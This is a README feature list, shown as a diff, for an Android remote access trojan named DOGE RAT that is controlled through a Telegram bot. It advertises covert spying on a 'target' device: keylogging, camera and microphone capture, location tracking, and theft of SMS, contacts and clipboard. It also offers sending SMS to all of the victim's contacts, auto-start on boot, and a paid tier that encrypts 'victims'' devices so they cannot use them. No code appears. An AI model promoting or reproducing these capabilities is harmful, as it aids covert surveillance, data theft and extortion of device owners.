Waylez/Waylez/README.md

-## Features
-- 🔴 Real time
-- 🌐 custom web view
-- 🔔 notification reader
-- 🔔 notification sender (send custom notification that apper on target device with custom click link)
-- 🗨️ show toast message on target device (Toasts are messages that appear in a box at the bottom of the device)
-- 📡 receive information about simcard provider
-- 📳 vibrate target device
-- 🛰️ receive device location
-- ✉️ receive all target message
-- ✉️ send sms with target device to any number
-- ✉️ send sms with target device to all of his/her contacts
-- 👤 recive all target contacts
-- 💻 receive list of all installedd apps in target device
-- 📷 capture main and front camera
-- 🎙 capture microphone (with custom duration)
-- 📋 receive last clipboard text
-- ✅️ auto start after device boot
-- 🔐 Keylogger
-- ✨ Beautiful telegram bot interface
   ## DOGE RAT PAID VERSION FEATURES
 - 🤖 Auto permisson
 - 🔐Encrypt/ Decrypt after encryption victims will be not able to use their devices